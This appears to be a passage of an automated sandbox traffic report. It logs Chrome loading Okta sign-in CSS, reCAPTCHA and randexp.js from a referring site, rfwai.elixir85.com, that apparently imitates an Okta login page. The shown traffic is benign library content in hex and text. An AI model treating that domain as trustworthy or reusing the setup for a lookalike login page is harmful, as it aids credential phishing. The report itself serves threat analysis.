                                                        2024-07-03 19:07:21 UTC1369INData Raw: 24 8e 7d 5f 63 dd ad 18 fe a6 ff 2f f7 e0 48 1c b2 5f b8 86 07 10 29 77 0d 94 bb da 56 ae 12 b2 a3 52 05 42 25 2a c4 14 33 04 30 9f 14 5e 4b 90 15 6a 35 2d 17 f1 e9 d1 c8 8c 10 b7 07 f7 7c d3 af d8 6b dd ed c3 7e 30 12 fb 17 34 1b 0d 60 54 b1 df fa a9 f5 63 20 86 c1 4c 3a c3 70 bf e7 87 a0 95 ae a4 74 86 83 52 38 d4 c4 23 96 f5 2c c3 50 ba 17 53 ce 30 ae 2e 00 50 aa d5 6a 85 52 1b 8f 90 9e d5 b1 7a a4 65 75 f8 2d ac bd b6 ce 7a b1 ff 71 ec 9f 37 82 ee f0 43 77 d6 a3 32 e1 06 3f f4 99 35 07 ca 67 99 f7 a1 fc 9d 50 be 0f 13 ca c4 30 53 2d d9 2e 88 c7 84 7e cc 00 53 f9 46 86 65 09 e9 8c 67 99 12 71 1c e1 0e f2 42 e5 e1 61 be 9a 68 7d 58 4c 78 4c 48 90 26 d4 37 34 31 42 05 cd d2 e8 52 c3 b0 9f af 42 e9 ef ef e7 eb 89 f5 3a 94 9a 87 d3 d3 62 f4 3a 35 4a cd 10
                                                        Data Ascii: $}_c/H_)wVRB%*30^Kj5-|k~04`Tc L:ptR8#,PS0.PjRzeu-zq7Cw2?5gP0S-.~SFegqBah}XLxLH&741BRB:b:5J
                                                        2024-07-03 19:07:21 UTC1369INData Raw: b5 cd 45 45 5b 6e 74 ff e5 22 3a 74 e6 cc b9 53 7f e5 87 cc 6d c7 17 37 9e 58 9a 61 3d 8f bf da d6 df b7 4b 50 42 bd 3d a3 67 f9 eb c0 1f 2d 93 c4 58 2c 53 c3 42 43 82 7d 78 cc fa 69 c0 20 c0 a5 be 64 0a 9e 9c 65 81 01 88 31 44 07 24 05 26 01 cb b4 48 3b 39 cb 94 5a a5 81 b0 2d c3 6c 30 6b 33 32 c6 f1 0e d9 78 46 3e e7 ce fa d1 f2 57 cb 5e e9 9d 37 9c fe 79 f7 27 e9 a9 c0 3b 67 3c 3c 26 dc 5d f2 a3 e6 57 cd 53 8f 19 a3 3f 6f fc a4 ec ad c9 78 79 1f 9d 93 83 99 54 4b 12 0b 76 02 99 91 c5 a9 bf 11 b4 36 5b cb d8 4d ff be 9a a0 00 4d b0 6f b0 4e 3d cd 57 09 52 85 60 06 06 51 8d 8c 84 e9 16 f4 06 30 58 9e 7d b9 85 f7 df 83 ba 5f 10 1e 67 15 ac 70 e7 22 7a b2 f3 d1 f5 d3 05 c3 d1 fb ce 1f 12 04 f6 ee ee 1f c5 58 d7 e3 55 d6 fd c0 ec a5 87 85 c7 b6 f6 f6 0e 0a
                                                        Data Ascii: EE[nt":tSm7Xa=KPB=g-X,SBC}xi de1D$&H;9Z-l0k32xF>W^7y';g<<&]WS?oxyTKv6[MMoN=WR`Q0X}_gp"zXU
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 11 4c b9 65 66 58 28 56 91 e1 64 93 29 7b 49 42 60 ed 03 9f cb 18 22 48 2e 36 7a 83 03 35 3e 6a 6f 2f 4f 0f 91 68 05 13 81 22 5c c7 a8 b6 1b 5a 7e 9e ec 18 e9 ec db 4d dd c5 79 d6 39 63 8e 50 de 92 69 ba a9 29 09 85 41 a5 86 35 c2 9c ee ea a2 0d 46 69 bc 85 9e 62 63 a7 96 c5 98 32 8d fa e9 a6 3c 42 73 99 50 85 5d e8 fc 01 d6 90 c6 c7 45 c1 51 25 20 cf 23 ac 8d 3a 6f 4f e0 23 cc 22 dc 18 45 30 7d 8c e3 61 54 6b 6f 99 e5 62 75 53 ae 29 61 46 48 99 b1 47 a8 5a 59 5b d6 17 45 d8 15 d2 5b 98 91 13 6d 98 9e 99 4d e6 2c a1 8a ce 59 09 c4 8f 57 20 c4 c6 c5 42 3f e2 52 e2 72 d2 99 8f 8e 3e 6d 19 58 10 76 dd 69 88 0e 0c f0 d3 78 7b b9 2a 99 04 94 60 d7 9d 64 90 39 ce 6a 0a a5 82 fc df 8e 4b 47 9b 7b e3 a6 f8 4f 09 1c 20 73 dd fd cf ff e0 dc c5 92 32 5d 71 74 62 a6
                                                        Data Ascii: LefX(Vd){IB`"H.6z5>jo/Oh"\Z~My9cPi)A5Fibc2<BsP]EQ% #:oO#"E0}aTkobuS)aFHGZY[E[mM,YW B?Rr>mXvix{*`d9jKG{O s2]qtb


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        56192.168.2.549788142.250.186.1644433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:20 UTC717OUTGET /recaptcha/api.js HTTP/1.1
                                                        Host: www.google.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:21 UTC528INHTTP/1.1 200 OK
                                                        Content-Type: text/javascript; charset=utf-8
                                                        Expires: Wed, 03 Jul 2024 19:07:20 GMT
                                                        Date: Wed, 03 Jul 2024 19:07:20 GMT
                                                        Cache-Control: private, max-age=300
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: frame-ancestors 'self'
                                                        X-XSS-Protection: 1; mode=block
                                                        Server: GSE
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Accept-Ranges: none
                                                        Vary: Accept-Encoding
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2024-07-03 19:07:21 UTC862INData Raw: 35 39 61 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                        Data Ascii: 59a/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                        2024-07-03 19:07:21 UTC579INData Raw: 6f 6e 4c 61 62 65 6c 29 7b 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 2e 67 65 74 56 61 6c 75 65 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 69 66 28 6c 21 3d 3d 27 74 72 65 61 74 6d 65 6e 74 5f 31 2e 31 27 26 26 6c 21 3d 3d 27 74 72 65 61 74 6d 65 6e 74 5f 31 2e 32 27 26 26 6c 21 3d 3d 27 63 6f 6e 74 72 6f 6c 5f 31 2e 31 27 29 7b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 7d 7d 29 3b 7d 65 6c 73 65 7b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 7d 70 6f 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 72 4b 62 54 76 78 54 78 77 63 77 35 56 71 7a 72 74 4e 2d 49 43 77 57 74 2f 72 65 63 61 70 74
                                                        Data Ascii: onLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m);}});}else{d.head.prepend(m);}po.src='https://www.gstatic.com/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recapt
                                                        2024-07-03 19:07:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        57192.168.2.549787140.82.121.34433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:20 UTC655OUTGET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1
                                                        Host: github.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:21 UTC995INHTTP/1.1 302 Found
                                                        Server: GitHub.com
                                                        Date: Wed, 03 Jul 2024 19:07:20 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                        Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T190720Z&X-Amz-Expires=300&X-Amz-Signature=2954020ef3ae9b37bcd25c50a692a541af80978c55971e321c89a2f9def9fd71&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                        Cache-Control: no-cache
                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                        X-Frame-Options: deny
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 0
                                                        Referrer-Policy: no-referrer-when-downgrade
                                                        2024-07-03 19:07:21 UTC3029INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        58192.168.2.549789108.156.39.604433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:20 UTC601OUTGET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1
                                                        Host: ok4static.oktacdn.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:21 UTC769INHTTP/1.1 200 OK
                                                        Content-Type: text/css
                                                        Content-Length: 222931
                                                        Connection: close
                                                        Date: Tue, 02 Jul 2024 11:12:41 GMT
                                                        Server: nginx
                                                        Last-Modified: Tue, 14 May 2024 21:48:24 GMT
                                                        ETag: "0329c939fca7c78756b94fbcd95e322b"
                                                        x-amz-meta-sha1sum: 7b5499b46660a0348cc2b22cae927dcc3fda8b20
                                                        Expires: Wed, 02 Jul 2025 11:12:41 GMT
                                                        Cache-Control: max-age=31536000
                                                        Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                        Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                        Access-Control-Allow-Origin: *
                                                        Accept-Ranges: bytes
                                                        Vary: Accept-Encoding
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 f73d71dfa047571774d2c0460e5108ec.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: LHR50-P1
                                                        X-Amz-Cf-Id: 0NlCHTQdGfPFrWs2H9yOqrO-KJhC8SBjdqVPZvlSix6CI7QA_7nrdQ==
                                                        Age: 114879
                                                        2024-07-03 19:07:21 UTC15615INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 71 74 69 70 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 2e 35 70 78 3b 6c 65 66 74 3a 2d 32 38 30 30 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 32 38 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 35 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 32 38 30 30 30 70 78 7d 2e 71 74 69 70 2d 63 6f 6e 74 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 70 61 64 64 69 6e 67 3a 35 70 78 20 39 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 71
                                                        Data Ascii: @charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.q
                                                        2024-07-03 19:07:21 UTC375INData Raw: 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 2a 3d 22 2d 34 38 22 5d 3a 61 66 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 2a 3d 22 2d 34 38 22 5d 3a 62 65 66 6f 72 65 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 5e 3d 22 2d 34 38 22 5d 3a 61 66 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 5e 3d 22 2d 34 38 22 5d 3a 62 65 66 6f 72 65 7b 73 70 65 61 6b 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c
                                                        Data Ascii: x;-webkit-box-sizing:border-box;box-sizing:border-box;vertical-align:top}#okta-sign-in [class*="-48"]:after,#okta-sign-in [class*="-48"]:before,#okta-sign-in [class^="-48"]:after,#okta-sign-in [class^="-48"]:before{speak:none;-webkit-font-smoothing:antial
                                                        2024-07-03 19:07:21 UTC16384INData Raw: 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 65 78 74 2d 69 6e 64 65 6e 74 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 2a 3d 22 2d 33 32 22 5d 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 5e 3d 22 2d 33 32 22 5d 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f
                                                        Data Ascii: -style:normal!important;font-weight:300!important;position:absolute;text-indent:0;white-space:normal}#okta-sign-in [class*="-32"],#okta-sign-in [class^="-32"]{-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;vertical-align:to
                                                        2024-07-03 19:07:21 UTC16384INData Raw: 35 65 35 65 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 62 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 72 75 6e 2d 31 36 2d 77 68 69 74 65 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 62 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 64 6f 77 6e 6c 6f 61 64 2d 31 36 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 30 30 37 63 63 30 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 33 66 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 31 36 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 35 65 35 65 35 65 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 39 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 61 64 64 2d 31 36 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 35 65 35 65 35
                                                        Data Ascii: 5e5e;content:"\e04b"}#okta-sign-in .run-16-white:before{color:#fff;content:"\e04b"}#okta-sign-in .download-16:before{color:#007cc0;content:"\e03f"}#okta-sign-in .group-16:before{color:#5e5e5e;content:"\e019"}#okta-sign-in .group-add-16:before{color:#5e5e5
                                                        2024-07-03 19:07:21 UTC16384INData Raw: 20 2e 6f 70 74 69 6f 6e 73 20 6c 69 2e 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2e 2e 2f 69 6d 67 2f 69 63 6f 6e 73 2f 31 36 78 31 36 2f 65 72 72 6f 72 2d 30 31 2e 70 6e 67 29 20 35 70 78 20 38 70 78 20 6e 6f 2d 72 65 70 65 61 74 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 32 66 32 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 35 70 78 20 31 30 70 78 20 32 35 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 64 72 6f 70 64 6f 77 6e 20 2e 6f 70 74 69 6f 6e 73 20 6c 69 2e 65 72 72 6f 72 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 63 65 35 65 36 21 69 6d 70 6f 72 74 61 6e 74 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d
                                                        Data Ascii: .options li.error{background:url(../img/icons/16x16/error-01.png) 5px 8px no-repeat!important;background-color:#fff2f2!important;padding:10px 5px 10px 25px}#okta-sign-in .dropdown .options li.error:hover{background-color:#fce5e6!important;cursor:pointer}
                                                        2024-07-03 19:07:21 UTC16384INData Raw: 63 6f 6e 74 61 69 6e 65 72 2d 73 69 6e 67 6c 65 2d 6e 6f 73 65 61 72 63 68 2e 63 6c 6f 73 65 64 20 2e 63 68 7a 6e 2d 64 72 6f 70 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 69 6e 67 6c 65 2e 63 6c 6f 73 65 64 20 2e 63 68 7a 6e 2d 64 72 6f 70 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2d 33 35 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 33 36 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 2d 33 35 70 78 3b 7a 2d 69 6e 64 65 78 3a 30 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 68
                                                        Data Ascii: container-single-nosearch.closed .chzn-drop,#okta-sign-in .chzn-container.chzn-container-single.closed .chzn-drop{border:none;left:0;margin-bottom:-35px;min-height:36px;overflow:hidden;position:relative;top:-35px;z-index:0}#okta-sign-in .chzn-container.ch
                                                        2024-07-03 19:07:21 UTC16384INData Raw: 69 75 73 3a 30 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 75 73 74 6f 6d 2d 63 68 65 63 6b 62 6f 78 20 6c 61 62 65 6c 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 75 73 74 6f 6d 2d 72 61 64 69 6f 20 6c 61 62 65 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 31 36 70 78 20 2d 31 33 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 75 73 74 6f 6d 2d 63 68 65 63 6b 62 6f 78 20 6c 61 62 65 6c 2e 66 6f 63 75 73 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 75 73 74 6f 6d 2d 63 68 65 63 6b 62 6f 78 20 6c 61 62 65 6c 2e 68 6f 76 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 75 73 74 6f 6d 2d 72 61 64 69 6f 20 6c 61 62 65 6c 2e 66 6f 63 75 73 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 75 73 74 6f
                                                        Data Ascii: ius:0}#okta-sign-in .custom-checkbox label,#okta-sign-in .custom-radio label{background-position:-16px -13px}#okta-sign-in .custom-checkbox label.focus,#okta-sign-in .custom-checkbox label.hover,#okta-sign-in .custom-radio label.focus,#okta-sign-in .custo
                                                        2024-07-03 19:07:21 UTC16384INData Raw: 35 70 78 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 64 65 76 69 63 65 2d 77 69 64 74 68 3a 33 32 30 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 64 65 76 69 63 65 2d 77 69 64 74 68 3a 35 36 38 70 78 29 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 20 2e 69 6e 70 75 74 2d 66 69 78 20 69 6e 70 75 74 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 20 2e 74 65 78 74 61 72 65 61 2d 66 69 78 20 69 6e 70 75 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 64 65 76 69 63 65 2d 77 69
                                                        Data Ascii: 5px}}@media only screen and (min-device-width:320px) and (max-device-width:568px) and (-webkit-min-device-pixel-ratio:2){#okta-sign-in .o-form .input-fix input,#okta-sign-in .o-form .textarea-fix input{font-size:15px}}@media only screen and (min-device-wi
                                                        2024-07-03 19:07:21 UTC15526INData Raw: 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 73 6f 63 69 61 6c 2d 61 75 74 68 2d 66 61 63 65 62 6f 6f 6b 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 62 66 62 66 62 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2e 2e 2f 69 6d 67 2f 69 63 6f 6e 73 2f 6c 6f 67 69 6e 2f 66 61 63 65 62 6f 6f 6b 5f 6c 6f 67 6f 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 31 32 70 78 2f 32 34 70 78 2c 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 39 30 64 65 67 2c 23 66 66 66 20 35 30 70 78 2c 23 66 62 66 62 66 62 20 30 29 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 33 63 33 63 33 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 73 6f 63 69 61 6c 2d 61 75 74 68 2d 66 61
                                                        Data Ascii: -decoration:none}#okta-sign-in .social-auth-facebook-button{background-color:#fbfbfb;background:url(../img/icons/login/facebook_logo.png) no-repeat 12px/24px,linear-gradient(90deg,#fff 50px,#fbfbfb 0);border:1px solid #c3c3c3}#okta-sign-in .social-auth-fa
